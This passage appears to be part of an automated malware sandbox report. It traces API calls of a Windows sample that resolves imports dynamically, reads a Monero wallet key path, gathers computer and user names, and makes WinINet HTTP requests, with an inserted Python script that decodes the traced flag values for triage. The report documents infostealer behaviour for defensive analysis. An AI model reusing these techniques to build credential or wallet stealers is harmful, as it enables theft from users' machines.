                  • HttpOpenRequestA.WININET(00000000,0105E810,?,0105EAD0,00000000,00000000,00400100,00000000), ref: 00924B15
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • InternetCloseHandle.WININET(00000000), ref: 00924ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 6d6aacd2f10cae9fbb8547c42782ee08ee2ed4ebf0d1b2cf5d8f456fdeaafc6b
                  • Instruction ID: 14216f5fec0592fda5fc82cd9adbccf16451b028803429423abdf16804e6c8c9
                  • Opcode Fuzzy Hash: 6d6aacd2f10cae9fbb8547c42782ee08ee2ed4ebf0d1b2cf5d8f456fdeaafc6b
                  • Instruction Fuzzy Hash: AC12B972910218AADB15EB90DC92FEEB779AF94300F504199F14673091EF742F49CF66
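Added example, not part of the Joe Sandbox report and not code from the sample: a small Python decoder for the numeric arguments in the "APIs" records above. The sandbox prints every argument as raw hex (or "?" when it could not capture it), so the flag words have to be read against the documented prototypes: for the routine at 9245C0 that turns VirtualProtect's third argument 00000100 into PAGE_GUARD, and for the WinINet routine at 924880 it turns HttpOpenRequestA's 00400100 into INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, InternetConnectA's 00000003 into INTERNET_SERVICE_HTTP, InternetOpenA's 00000001 into INTERNET_OPEN_TYPE_DIRECT, and InternetReadFile's 000007CF into 1999-byte reads. The argument positions are assumed to follow the Win32 prototypes in call order (which is how these lines are laid out); the constants are the documented winnt.h / wininet.h values. The captured values are best-effort: PAGE_GUARD on its own is not a valid protection for VirtualProtect, so the decoder flags it for confirmation in a debugger rather than treating it as fact.

```python
import re

# Constructed input: argument records copied verbatim from this report's
# function blocks (the addresses and values are the report's, not invented).
REPORT_LINES = [
    "• VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0092479C",
    "• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00924915",
    "• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00924ABA",
    "• HttpOpenRequestA.WININET(00000000,0105E810,?,0105EAD0,00000000,00000000,00400100,00000000), ref: 00924B15",
    "• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00924E49",
]

# Documented Win32 constants (winnt.h / wininet.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
    0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE",
}
INTERNET_FLAGS = {
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x80000000: "INTERNET_FLAG_RELOAD",
}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}

# Per API: 0-based position of the argument worth decoding and how to read it.
# Assumption: the sandbox lists arguments in prototype (call) order.
ARG_SPEC = {
    "VirtualProtect":   (2, "bitmask", PAGE_PROTECTION),   # flNewProtect
    "HttpOpenRequestA": (6, "bitmask", INTERNET_FLAGS),    # dwFlags
    "InternetConnectA": (5, "enum", INTERNET_SERVICE),     # dwService
    "InternetOpenA":    (1, "enum", INTERNET_OPEN_TYPE),   # dwAccessType
    "InternetReadFile": (2, "size", None),                 # dwNumberOfBytesToRead
}

LINE_RE = re.compile(r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")


def parse_api_line(line):
    """Split one 'Api.MODULE(args), ref: addr' record; None if the line is not one."""
    m = LINE_RE.search(line)
    if not m:
        return None
    api, module, args, ref = m.groups()
    return api, module, [a.strip() for a in args.split(",")], ref


def names_for_bitmask(value, table):
    """Expand a flag word into constant names, lowest bit first; unknown bits stay as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = sum(bit for bit in table if value & bit)
    leftover = value & ~known
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def decode_api_line(line):
    """Decode the interesting argument of one record into constant names plus caveats."""
    parsed = parse_api_line(line)
    if parsed is None:
        return None
    api, module, args, ref = parsed
    result = {"api": api, "module": module, "ref": ref, "decoded": [], "notes": []}
    spec = ARG_SPEC.get(api)
    if spec is None:
        result["notes"].append("no decoder for this API")
        return result
    index, kind, table = spec
    if index >= len(args) or args[index] == "?":
        result["notes"].append("argument not captured by the sandbox")
        return result
    value = int(args[index], 16)
    if kind == "bitmask":
        result["decoded"] = names_for_bitmask(value, table)
        # PAGE_GUARD / PAGE_NOCACHE are modifiers; a valid flNewProtect also
        # needs one base protection in the low byte, otherwise the call fails.
        if table is PAGE_PROTECTION and value & 0xFF == 0:
            result["notes"].append("no base protection in flNewProtect; confirm the captured value in a debugger")
    elif kind == "enum":
        result["decoded"] = [table.get(value, f"unknown ({value})")]
    else:  # size
        result["decoded"] = [f"{value} bytes"]
    return result


def decode_report(lines):
    """Decode every API record in a list of report lines, keyed by API name (last record wins)."""
    out = {}
    for line in lines:
        r = decode_api_line(line)
        if r is not None:
            out[r["api"]] = r
    return out


if __name__ == "__main__":
    for api, r in decode_report(REPORT_LINES).items():
        print(f"{api:18} @ {r['ref']}: {', '.join(r['decoded']) or '-'}  {'; '.join(r['notes'])}")
```

Run against the five records above it prints one decoded line per API; extend ARG_SPEC with further prototypes (CreateFileA's dwDesiredAccess, VirtualAlloc's flProtect) when triaging other records of the same form. The "------" and `"` string IDs in the 924880 record are what a multipart form body would use, but the report does not show the body itself, so that stays an observation rather than a finding.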
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00937917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0093792F
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: 4e9b404d21d6c6e0828150971511fc7249e9c75061fdbcd78e72ab75a5e9a5c9
                  • Instruction ID: a4df44b8b3d3da729f416243b986f2d38fdad256dc7aad56b3c0e6ff855b81d1
                  • Opcode Fuzzy Hash: 4e9b404d21d6c6e0828150971511fc7249e9c75061fdbcd78e72ab75a5e9a5c9
                  • Instruction Fuzzy Hash: 690186B1904204EBDB10DF94DD45BAAFBBCF744B21F104219FA45E72C0D77859008FA2
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009211B7), ref: 00937880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00937887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0093789F
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 53ddb4522fdc10bd1f4e55446efe80fc84b697ab0437666c15619c5486fee251
                  • Instruction ID: 6bbffc2f01b3df1dbd291c50d3f186b7fd2d4c9289f413cfc5c70929106b5750
                  • Opcode Fuzzy Hash: 53ddb4522fdc10bd1f4e55446efe80fc84b697ab0437666c15619c5486fee251
                  • Instruction Fuzzy Hash: C8F04FB1944209ABCB10DF98DD49BAEFBB8EB48711F10065AFA05A36C0C7B819048FA1
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 3b104418ed23a88f278c9190885dae5ada6a942efacc219e696f91324f4d00fb
                  • Instruction ID: c73e2804039228ea8ea2ae4b294924a127fd9cfc15b0f3ba4c4ae5a40ff9081a
                  • Opcode Fuzzy Hash: 3b104418ed23a88f278c9190885dae5ada6a942efacc219e696f91324f4d00fb
                  • Instruction Fuzzy Hash: CCD017749042089BCB009BA0984A6ADBB78EB08211F000555D90572280EA70A8918AA6

                  Control-flow Graph
                  control_flow_graph 633 939c10-939c1a 634 939c20-93a031 GetProcAddress * 43 633->634 635 93a036-93a0ca LoadLibraryA * 8 633->635 634->635 636 93a146-93a14d 635->636 637 93a0cc-93a141 GetProcAddress * 5 635->637 638 93a153-93a211 GetProcAddress * 8 636->638 639 93a216-93a21d 636->639 637->636 638->639 640 93a298-93a29f 639->640 641 93a21f-93a293 GetProcAddress * 5 639->641 642 93a337-93a33e 640->642 643 93a2a5-93a332 GetProcAddress * 6 640->643 641->640 644 93a344-93a41a GetProcAddress * 9 642->644 645 93a41f-93a426 642->645 643->642 644->645 646 93a4a2-93a4a9 645->646 647 93a428-93a49d GetProcAddress * 5 645->647 648 93a4ab-93a4d7 GetProcAddress * 2 646->648 649 93a4dc-93a4e3 646->649 647->646 648->649 650 93a515-93a51c 649->650 651 93a4e5-93a510 GetProcAddress * 2 649->651 652 93a612-93a619 650->652 653 93a522-93a60d GetProcAddress * 10 650->653 651->650 654 93a61b-93a678 GetProcAddress * 4 652->654 655 93a67d-93a684 652->655 653->652 654->655 656 93a686-93a699 GetProcAddress 655->656 657 93a69e-93a6a5 655->657 656->657 658 93a6a7-93a703 GetProcAddress * 4 657->658 659 93a708-93a709 657->659 658->659
                  APIs
                  • GetProcAddress.KERNEL32(76F70000,01046300), ref: 00939C2D
                  • GetProcAddress.KERNEL32(76F70000,010464C0), ref: 00939C45
                  • GetProcAddress.KERNEL32(76F70000,01059950), ref: 00939C5E
                  • GetProcAddress.KERNEL32(76F70000,010598F0), ref: 00939C76
                  • GetProcAddress.KERNEL32(76F70000,010598A8), ref: 00939C8E
                  • GetProcAddress.KERNEL32(76F70000,01059920), ref: 00939CA7
                  • GetProcAddress.KERNEL32(76F70000,0104B4B8), ref: 00939CBF
                  • GetProcAddress.KERNEL32(76F70000,010598C0), ref: 00939CD7
                  • GetProcAddress.KERNEL32(76F70000,01059908), ref: 00939CF0
                  • GetProcAddress.KERNEL32(76F70000,01059848), ref: 00939D08
                  • GetProcAddress.KERNEL32(76F70000,01059890), ref: 00939D20
                  • GetProcAddress.KERNEL32(76F70000,01046240), ref: 00939D39
                  • GetProcAddress.KERNEL32(76F70000,010462C0), ref: 00939D51
                  • GetProcAddress.KERNEL32(76F70000,01046560), ref: 00939D69
                  • GetProcAddress.KERNEL32(76F70000,01046580), ref: 00939D82
                  • GetProcAddress.KERNEL32(76F70000,010599F8), ref: 00939D9A
                  • GetProcAddress.KERNEL32(76F70000,01059860), ref: 00939DB2
                  • GetProcAddress.KERNEL32(76F70000,0104ADB0), ref: 00939DCB
                  • GetProcAddress.KERNEL32(76F70000,010462A0), ref: 00939DE3
                  • GetProcAddress.KERNEL32(76F70000,01059CA8), ref: 00939DFB
                  • GetProcAddress.KERNEL32(76F70000,01059DE0), ref: 00939E14
                  • GetProcAddress.KERNEL32(76F70000,01059E10), ref: 00939E2C
                  • GetProcAddress.KERNEL32(76F70000,01059C90), ref: 00939E44
                  • GetProcAddress.KERNEL32(76F70000,010462E0), ref: 00939E5D
                  • GetProcAddress.KERNEL32(76F70000,01059CC0), ref: 00939E75
                  • GetProcAddress.KERNEL32(76F70000,01059CD8), ref: 00939E8D
                  • GetProcAddress.KERNEL32(76F70000,01059CF0), ref: 00939EA6
                  • GetProcAddress.KERNEL32(76F70000,01059DB0), ref: 00939EBE
                  • GetProcAddress.KERNEL32(76F70000,01059D20), ref: 00939ED6
                  • GetProcAddress.KERNEL32(76F70000,01059D08), ref: 00939EEF
                  • GetProcAddress.KERNEL32(76F70000,01059D38), ref: 00939F07
                  • GetProcAddress.KERNEL32(76F70000,01059D50), ref: 00939F1F
                  • GetProcAddress.KERNEL32(76F70000,01059D68), ref: 00939F38
                  • GetProcAddress.KERNEL32(76F70000,0105C870), ref: 00939F50
                  • GetProcAddress.KERNEL32(76F70000,01059D80), ref: 00939F68
                  • GetProcAddress.KERNEL32(76F70000,01059D98), ref: 00939F81
                  • GetProcAddress.KERNEL32(76F70000,010461C0), ref: 00939F99
                  • GetProcAddress.KERNEL32(76F70000,01059DC8), ref: 00939FB1
                  • GetProcAddress.KERNEL32(76F70000,01046340), ref: 00939FCA
                  • GetProcAddress.KERNEL32(76F70000,01059DF8), ref: 00939FE2
                  • GetProcAddress.KERNEL32(76F70000,01059E28), ref: 00939FFA
                  • GetProcAddress.KERNEL32(76F70000,01046200), ref: 0093A013
                  • GetProcAddress.KERNEL32(76F70000,01046220), ref: 0093A02B
                  • LoadLibraryA.KERNEL32(01059E40,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A03D
                  • LoadLibraryA.KERNEL32(01059C78,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A04E
                  • LoadLibraryA.KERNEL32(0105D248,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A060
                  • LoadLibraryA.KERNEL32(0105D290,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A072
                  • LoadLibraryA.KERNEL32(0105D200,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A083
                  • LoadLibraryA.KERNEL32(0105D1E8,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A095
                  • LoadLibraryA.KERNEL32(0105D158,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A0A7
                  • LoadLibraryA.KERNEL32(0105D2C0,?,00935CA3,00940AEB,?,?,?,?,?,?,?,?,?,?,00940AEA,00940AE3), ref: 0093A0B8
                  • GetProcAddress.KERNEL32(75840000,01046800), ref: 0093A0DA
                  • GetProcAddress.KERNEL32(75840000,0105D2D8), ref: 0093A0F2
                  • GetProcAddress.KERNEL32(75840000,01058E50), ref: 0093A10A
                  • GetProcAddress.KERNEL32(75840000,0105D1B8), ref: 0093A123
                  • GetProcAddress.KERNEL32(75840000,01046820), ref: 0093A13B
                  • GetProcAddress.KERNEL32(73B90000,0104B210), ref: 0093A160
                  • GetProcAddress.KERNEL32(73B90000,01046920), ref: 0093A179
                  • GetProcAddress.KERNEL32(73B90000,0104B030), ref: 0093A191
                  • GetProcAddress.KERNEL32(73B90000,0105D1D0), ref: 0093A1A9
                  • GetProcAddress.KERNEL32(73B90000,0105D2F0), ref: 0093A1C2
                  • GetProcAddress.KERNEL32(73B90000,01046680), ref: 0093A1DA
                  • GetProcAddress.KERNEL32(73B90000,01046720), ref: 0093A1F2
                  • GetProcAddress.KERNEL32(73B90000,0105D140), ref: 0093A20B
                  • GetProcAddress.KERNEL32(760B0000,010466A0), ref: 0093A22C
                  • GetProcAddress.KERNEL32(760B0000,010465C0), ref: 0093A244
                  • GetProcAddress.KERNEL32(760B0000,0105D218), ref: 0093A25D
                  • GetProcAddress.KERNEL32(760B0000,0105D170), ref: 0093A275
                  • GetProcAddress.KERNEL32(760B0000,01046640), ref: 0093A28D
                  • GetProcAddress.KERNEL32(75D30000,0104B0F8), ref: 0093A2B3
                  • GetProcAddress.KERNEL32(75D30000,0104B198), ref: 0093A2CB
                  • GetProcAddress.KERNEL32(75D30000,0105D188), ref: 0093A2E3
                  • GetProcAddress.KERNEL32(75D30000,010466C0), ref: 0093A2FC
                  • GetProcAddress.KERNEL32(75D30000,01046620), ref: 0093A314
                  • GetProcAddress.KERNEL32(75D30000,0104AF40), ref: 0093A32C
                  • GetProcAddress.KERNEL32(753A0000,0105D2A8), ref: 0093A352
                  • GetProcAddress.KERNEL32(753A0000,010466E0), ref: 0093A36A
                  • GetProcAddress.KERNEL32(753A0000,01058EB0), ref: 0093A382
                  • GetProcAddress.KERNEL32(753A0000,0105D260), ref: 0093A39B
                  • GetProcAddress.KERNEL32(753A0000,0105D308), ref: 0093A3B3
                  • GetProcAddress.KERNEL32(753A0000,01046700), ref: 0093A3CB
                  • GetProcAddress.KERNEL32(753A0000,01046740), ref: 0093A3E4
                  • GetProcAddress.KERNEL32(753A0000,0105D1A0), ref: 0093A3FC
                  • GetProcAddress.KERNEL32(753A0000,0105D230), ref: 0093A414
                  • GetProcAddress.KERNEL32(76DA0000,01046780), ref: 0093A436
                  • GetProcAddress.KERNEL32(76DA0000,0105D278), ref: 0093A44E
                  • GetProcAddress.KERNEL32(76DA0000,0105D3D8), ref: 0093A466
                  • GetProcAddress.KERNEL32(76DA0000,0105D420), ref: 0093A47F
                  • GetProcAddress.KERNEL32(76DA0000,0105D4B0), ref: 0093A497
                  • GetProcAddress.KERNEL32(77300000,01046840), ref: 0093A4B8
                  • GetProcAddress.KERNEL32(77300000,01046860), ref: 0093A4D1
                  • GetProcAddress.KERNEL32(767E0000,01046660), ref: 0093A4F2
                  • GetProcAddress.KERNEL32(767E0000,0105D360), ref: 0093A50A
                  • GetProcAddress.KERNEL32(6F6A0000,01046760), ref: 0093A530
                  • GetProcAddress.KERNEL32(6F6A0000,01046880), ref: 0093A548
                  • GetProcAddress.KERNEL32(6F6A0000,010468A0), ref: 0093A560
                  • GetProcAddress.KERNEL32(6F6A0000,0105D3F0), ref: 0093A579
                  • GetProcAddress.KERNEL32(6F6A0000,010467A0), ref: 0093A591
                  • GetProcAddress.KERNEL32(6F6A0000,010468E0), ref: 0093A5A9
                  • GetProcAddress.KERNEL32(6F6A0000,010467C0), ref: 0093A5C2
                  • GetProcAddress.KERNEL32(6F6A0000,01046600), ref: 0093A5DA
                  • GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 0093A5F1
                  • GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 0093A607
                  • GetProcAddress.KERNEL32(75760000,0105D438), ref: 0093A629
                  • GetProcAddress.KERNEL32(75760000,01058E20), ref: 0093A641
                  • GetProcAddress.KERNEL32(75760000,0105D408), ref: 0093A659
                  • GetProcAddress.KERNEL32(75760000,0105D498), ref: 0093A672
                  • GetProcAddress.KERNEL32(762C0000,010468C0), ref: 0093A693
                  • GetProcAddress.KERNEL32(6EB60000,0105D4C8), ref: 0093A6B4
                  • GetProcAddress.KERNEL32(6EB60000,010467E0), ref: 0093A6CD
                  • GetProcAddress.KERNEL32(6EB60000,0105D4E0), ref: 0093A6E5
                  • GetProcAddress.KERNEL32(6EB60000,0105D450), ref: 0093A6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: 2b991a9e20a4cbdf5f25a46b34851a6a8286159a4e01d3f7307409b13a0f92be
                  • Instruction ID: f03561ed58fe73676b65da3d43970b461af45e5b9dc6c4c5de39d2c52016a8b7
                  • Opcode Fuzzy Hash: 2b991a9e20a4cbdf5f25a46b34851a6a8286159a4e01d3f7307409b13a0f92be
                  • Instruction Fuzzy Hash: 4A621DB5510200AFCB44DFA8EE989663BF9F78C701714851AE609E32E4DEBDA841DF53

                  Control-flow Graph
                  control_flow_graph 1033 926280-92630b call 93a7a0 call 9247b0 call 93a740 InternetOpenA StrCmpCA 1040 926314-926318 1033->1040 1041 92630d 1033->1041 1042 926509-926525 call 93a7a0 call 93a800 * 2 1040->1042 1043 92631e-926342 InternetConnectA 1040->1043 1041->1040 1062 926528-92652d 1042->1062 1045 926348-92634c 1043->1045 1046 9264ff-926503 InternetCloseHandle 1043->1046 1048 92635a 1045->1048 1049 92634e-926358 1045->1049 1046->1042 1050 926364-926392 HttpOpenRequestA 1048->1050 1049->1050 1052 9264f5-9264f9 InternetCloseHandle 1050->1052 1053 926398-92639c 1050->1053 1052->1046 1055 9263c5-926405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 92639e-9263bf InternetSetOptionA 1053->1056 1058 926407-926427 call 93a740 call 93a800 * 2 1055->1058 1059 92642c-92644b call 938940 1055->1059 1056->1055 1058->1062 1067 9264c9-9264e9 call 93a740 call 93a800 * 2 1059->1067 1068 92644d-926454 1059->1068 1067->1062 1071 926456-926480 InternetReadFile 1068->1071 1072 9264c7-9264ef InternetCloseHandle 1068->1072 1073 926482-926489 1071->1073 1074 92648b 1071->1074 1072->1052 1073->1074 1078 92648d-9264c5 call 